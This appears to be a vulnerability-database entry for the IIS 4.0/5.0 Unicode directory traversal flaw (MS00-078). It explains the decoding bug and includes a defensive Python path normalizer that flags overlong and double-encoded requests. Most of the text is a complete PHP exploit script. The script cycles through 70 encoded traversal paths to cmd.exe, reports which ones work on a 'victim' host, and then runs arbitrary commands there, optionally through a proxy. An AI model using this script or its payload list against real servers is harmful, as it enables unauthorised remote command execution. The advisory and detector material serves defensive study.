Microsoft IIS 4.0/5.0 Unicode Decoding Error Remote Command Execution Vulnerability (MS00-078)

Vulnerability ID: 1106045    Type: Input validation
Published: 2000-10-17    Updated: 2005-10-12
CVE ID: CVE-2000-0884
CNNVD ID: CNNVD-200012-156
Platform: Windows    CVSS score: 7.5
|Source
https://www.exploit-db.com/exploits/20301
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-156
|Details
IIS is a widely used Internet web server produced by Microsoft and bundled with Windows NT and Windows 2000. By default, some IIS directories allow executables to be run by submitting an HTTP request. The NSFOCUS security team found a flaw in the Unicode character decoding of IIS 4.0 and 5.0 that lets a remote user execute arbitrary commands through IIS. When IIS opens a file whose name contains Unicode characters it decodes them; if a user supplies certain special encodings, IIS wrongly opens or executes files and programs outside the web root.

For the Chinese editions of IIS 5.0/4.0, when the file name in a URL request contains a special encoding such as "%c1%hh" or "%c0%hh", IIS first decodes it to the bytes 0xc1 0xhh and then tries to open that file. Windows treats 0xc1 0xhh as a possible Unicode (UTF-8) sequence and decodes it again; for 0x00 <= 0xhh < 0x40 the decoding is essentially:

%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh

With this encoding many characters can be constructed, for example:

%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '\'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '/'

An attacker can use this to bypass IIS's path check and execute or open arbitrary files. Rain Forest Puppy found that the English editions of IIS 4.0/5.0 have the same problem, only with a slightly different encoding: "%c0%af" or "%c1%9c".
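The decoding rule above, worked through in code as an added example (not part of the original advisory or the exploit below): a permissive UTF-8 decoder of the shape the advisory describes, then a request-path normalizer that a log reviewer or a filter in front of a legacy server could use to flag double-encoded and overlong separators that climb out of the web root. The sample request paths are constructed and the function names are my own.

```python
import re
from urllib.parse import unquote_to_bytes

# Lead-byte mask, prefix and minimum code point for the 2..6-byte UTF-8 forms.
_UTF8_FORMS = ((0xe0, 0xc0, 0x80), (0xf0, 0xe0, 0x800), (0xf8, 0xf0, 0x10000),
               (0xfc, 0xf8, 0x200000), (0xfe, 0xfc, 0x4000000))
_PCT = re.compile(rb"%[0-9A-Fa-f]{2}")

def lenient_utf8_decode(data: bytes):
    """Decode the permissive way the advisory describes: an overlong sequence
    still yields the code point its payload bits spell out, and the 10xxxxxx
    marker on trailing bytes is not enforced, so %c1%1c decodes like %c1%9c.
    Returns (text, saw_overlong)."""
    out, overlong, i = [], False, 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        for n, (pmask, prefix, min_cp) in enumerate(_UTF8_FORMS, start=2):
            if (b & pmask) == prefix and i + n <= len(data):
                cp = b & (0xff ^ pmask)            # (0xc1 - 0xc0) in the advisory's formula
                for t in data[i + 1:i + n]:
                    cp = (cp << 6) | (t & 0x3f)    # ... * 0x40 + 0xhh
                overlong = overlong or cp < min_cp  # a shorter form exists: overlong
                out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
                i += n
                break
        else:                                      # not a lead byte
            out.append("\ufffd"); i += 1
    return "".join(out), overlong

def normalize_request_path(url: str):
    """Decode a request path the way the vulnerable server ends up doing,
    then resolve dot segments. Returns (resolved_path, flags)."""
    data = url.split("?", 1)[0].encode("latin-1", "replace")  # drop the query
    rounds = 0
    while _PCT.search(data) and rounds < 3:        # %255c needs two passes
        data = unquote_to_bytes(data); rounds += 1
    text, overlong = lenient_utf8_decode(data)
    parts, escapes = [], False
    for seg in text.replace("\\", "/").split("/"):  # IIS takes both separators
        if seg == "..":
            if parts: parts.pop()
            else: escapes = True                   # climbed above the web root
        elif seg not in ("", "."):
            parts.append(seg)
    flags = {"double_encoded": rounds > 1, "overlong_utf8": overlong,
             "escapes_root": escapes}
    return "/" + "/".join(parts), flags

if __name__ == "__main__":
    # Constructed samples: two shaped like the advisory's vectors, two benign.
    for u in ("/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
              "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
              "/docs/%e4%b8%ad.html", "/a/b/../c.html"):
        print(u, "->", *normalize_request_path(u))
```

Any request whose flags include `escapes_root` should be rejected before the path reaches the file system; `overlong_utf8` alone is already a strong signal, since no legitimate client emits overlong sequences.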
|Exploit
source: http://www.securityfocus.com/bid/1806/info
 
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
 
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
 
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
 
This is the vulnerability exploited by the Code Blue Worm.
 
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.

```php
#!php -q
<?php
// Known request-path variants: double URL encoding (%255c, %252f, %%35c) and
// overlong UTF-8 forms (%c0%af, %c1%9c, %e0%80%af, ...) of "\" and "/" under
// the IIS sample virtual directories, each ending in a cmd.exe invocation.
$vector_ataque[0]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$vector_ataque[1]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[2]="/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[3]="/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[4]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[5]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$vector_ataque[6]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[7]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
$vector_ataque[8]="/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
$vector_ataque[9]="/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[10]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[11]="/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[12]="/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$vector_ataque[13]="/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[14]="/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[15]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
$vector_ataque[16]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$vector_ataque[17]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[18]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[19]="/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[20]="/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$vector_ataque[21]="/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[22]="/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[23]="/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[24]="/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
$vector_ataque[25]="/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[26]="/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
$vector_ataque[27]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
$vector_ataque[28]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
$vector_ataque[29]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[30]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
$vector_ataque[31]="/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[32]="/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[33]="/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$vector_ataque[34]="/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[35]="/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[36]="/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
$vector_ataque[37]="/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
$vector_ataque[38]="/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
$vector_ataque[39]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
$vector_ataque[40]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
$vector_ataque[41]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
$vector_ataque[42]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
$vector_ataque[43]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[44]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
$vector_ataque[45]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
$vector_ataque[46]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$vector_ataque[47]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
$vector_ataque[48]="/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[49]="/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[50]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[51]="/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";
$vector_ataque[52]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
$vector_ataque[53]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
$vector_ataque[54]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
$vector_ataque[55]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
$vector_ataque[56]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
$vector_ataque[57]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$vector_ataque[58]="/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[59]="/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[60]="/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[61]="/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[62]="/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[63]="/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[64]="/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[65]="/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[66]="/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[67]="/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[68]="/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
$vector_ataque[69]="/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";

if(!isset($argv[1]))
{
    echo "\n\n--------------------------------------------------------------------\n";
    echo "------------- (c) UNICODE exploit for IIS 5.0/4.0 by BoloTron ------\n";
    echo "--------------------------------------------------------------------\n\n";
    echo "Usage of the wicked device:\n";
    echo $argv[0]." -t www.victim.vic\n";
    echo $argv[0]." -t www.victim.vic -p proxy:port\n";
    echo $argv[0]."  www.victim.vic command variant_number\n";
    echo $argv[0]." -p proxy:port www.victim.vic command variant_number\n";
    echo "Options:\n";
    echo "-t --> Test the vulnerability (Try known variants till find the good one)\n";
    echo "-p --> Attack through proxy\n";
    echo "\nUse Mode:\n1) Test the host and get the variants number in case vulnerability exists\n";
    echo "2) Attack with command and variants number (optionally you can use proxy)\n";
    echo "Note : When you specify a command with spaces, replace spaces with low script \"_\" \n";
    echo "and you must double the backslash \"\\\". \nExample ".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
    echo "Thanks to An-tonio for the proxy support.\n";
    echo "Bug discovered by Anonymous Post.\n";
    echo "TYPE ".$argv[0]." spanish, for Spanish help.\n";
}
else
{
    if($argv[1]=="spanish")
    {
        echo "\n\n--------------------------------------------------------------------\n";
        echo "------------- (c) Exploit UNICODE para IIS 5.0/4.0 por BoloTron ----\n";
        echo "--------------------------------------------------------------------\n\n";
        echo "Uso del artefacto maligno :\n";
        echo $argv[0]." -t www.victima.vic\n";
        echo $argv[0]." -t www.victima.vic -p proxy:puerto\n";
        echo $argv[0]."  www.victima.vic comando nº_de_variante\n";
        echo $argv[0]." -p proxy:port www.victima.vic comando nº_de_variante\n";
        echo "Opciones:\n";
        echo "-t --> Testea la vulnerabilidad, prueba todas las variantes hasta encontrar una buena.\n";
        echo "-p --> Ataque a traves de proxy\n";
        echo "\nModo de Empleo:\n1) Testear el host y anotar el numero de variante en caso de ser vulnerable\n";
        echo "2) Atacar especificando comando y nº de variante (opcionalmente puedes especificar un proxy)\n";
        echo "Nota : Cuando se especifica un comando en el que hay espacios hay que sustituirlos por un guion bajo _ \n";
        echo "y las contrabarras hay que ponerlas dobles. \nEjemplo : ".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
        echo "Gracias a An-tonio por sus indicaciones en el soporte proxy.\n";
        echo "Bug descubierto por aviso anonimo.\n";
        exit;
    }
    if($argv[1]=="-t")
    {
        // Test mode: try every variant with "dir c:\" and treat a directory
        // listing ("<DIR>") in the response as proof of the vulnerability.
        $comando="dir+c:\\";
        if (isset($argv[3]) && $argv[3]=="-p")
        {
            $prox=explode(":",$argv[4]);
            for($i=0;$i<70;$i++)
            {
                $fp = fsockopen($prox[0], $prox[1]);
                if(!$fp)
                {
                    echo "Connection failed...\n";
                }
                else
                {
                    // Absolute URL in the request line because it goes through the proxy.
                    fputs($fp,"GET http://".$argv[2].$vector_ataque[$i].$comando." HTTP/1.0\n\n");
                    echo "Trying variant number ".$i." ";
                    $resul="";
                    while(!feof($fp))
                    {
                        $resul=$resul.fgets($fp,128);
                    }
                    fclose($fp);
                    if (strpos($resul, "<DIR>") !== false)
                    {
                        echo "-----> Vulnerable!!\n";
                        exit;
                    }
                    else
                    {
                        echo "-----> NoT Vulnerable :(\n";
                    }
                }
            }
        }
        else
        {
            $port=80;
            for($i=0;$i<70;$i++)
            {
                $fp = fsockopen($argv[2], $port);
                if(!$fp)
                {
                    echo "Connection failed...\n";
                }
                else
                {
                    fputs($fp,"GET ".$vector_ataque[$i].$comando." HTTP/1.0\n\n");
                    echo "Trying variant number ".$i." ";
                    $resul="";
                    while(!feof($fp))
                    {
                        $resul=$resul.fgets($fp,128);
                    }
                    fclose($fp);
                    if (strpos($resul, "<DIR>") !== false)
                    {
                        echo "-----> Vulnerable!!\n";
                        exit;
                    }
                    else
                    {
                        echo "-----> Not Vulnerable :(\n";
                    }
                }
            }
        }
    }
    else
    {
        // Attack mode: send one chosen variant with the user's command
        // ("_" in the command stands for a space, sent as "+").
        if($argv[1]=="-p")
        {
            $prox=explode(":",$argv[2]);
            $port=$prox[1];
            $comando=str_replace("_","+",$argv[4]);
            $fp = fsockopen($prox[0], $port);
            if(!$fp)
            {
                echo "Connection failed.\n";
            }
            else
            {
                fputs($fp,"GET http://".$argv[3].$vector_ataque[$argv[5]].$comando." HTTP/1.0\n\n");
                while(!feof($fp))
                {
                    echo fgets($fp,128);
                }
                fclose($fp);
            }
        }
        else
        {
            $port=80;
            $comando=str_replace("_","+",$argv[2]);
            $fp = fsockopen($argv[1], $port);
            if(!$fp)
            {
                echo "Connection failed.\n";
            }
            else
            {
                fputs($fp,"GET ".$vector_ataque[$argv[3]].$comando." HTTP/1.0\n\n");
                while(!feof($fp))
                {
                    echo fgets($fp,128);
                }
                fclose($fp);
            }
        }
    }
}
?>
```
|References

Source: MS
Name: MS00-078
Link: http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
Source: XF
Name: iis-unicode-translation
Link: http://xforce.iss.net/static/5377.php
Source: BID
Name: 1806
Link: http://www.securityfocus.com/bid/1806
Source: OSVDB
Name: 436
Link: http://www.osvdb.org/436
Source: US Government Resource (OVAL)
Name: oval:org.mitre.oval:def:44
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:44
